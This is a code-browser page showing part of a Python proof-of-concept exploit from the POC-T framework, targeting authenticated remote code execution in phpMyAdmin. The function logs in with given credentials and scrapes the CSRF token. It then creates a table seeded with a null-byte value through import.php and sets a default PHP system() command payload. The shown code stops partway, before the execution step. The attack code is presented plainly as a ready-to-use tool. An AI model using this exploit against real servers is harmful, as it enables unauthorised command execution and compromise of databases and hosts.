MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/phpmyadmin-auth-rce.py:30–120  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

28
29
30def poc(url):
31 url_to_pma = url
32 uname = USER
33 upass = PASS
34
35 if DATABASE:
36 db = DATABASE
37 else:
38 db = "test"
39
40 custom_table = False
41 if TABLE:
42 custom_table = True
43 table = TABLE
44 else:
45 table = "prgpwn"
46
47 if COMMAND:
48 payload = COMMAND
49 else:
50 payload = "system('uname -a');"
51
52 s = requests.Session()
53 s.verify = False
54 sql = '''CREATE TABLE `{0}` (
55 `first` varchar(10) CHARACTER SET utf8 NOT NULL
56 ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
57 INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
58 '''.format(table)
59
60 # get_token
61 resp = s.post(url_to_pma + "/?lang=en", dict(
62 pma_username=uname,
63 pma_password=upass
64 ))
65 if resp.status_code is 200:
66 token_place = resp.text.find("token=") + 6
67 token = resp.text[token_place:token_place + 32]
68 else:
69 # print("Cannot get valid authorization token.")
70 return False
71
72 if custom_table is False:
73 data = {
74 "is_js_confirmed": "0",
75 "db": db,
76 "token": token,
77 "pos": "0",
78 "sql_query": sql,
79 "sql_delimiter": ";",
80 "show_query": "0",
81 "fk_checks": "0",
82 "SQL": "Go",
83 "ajax_request": "true",
84 "ajax_page_request": "true",
85 }
86 resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
87 if resp.status_code == 200:

Callers

nothing calls this directly

Calls 1

formatMethod · 0.80

Tested by

no test coverage detected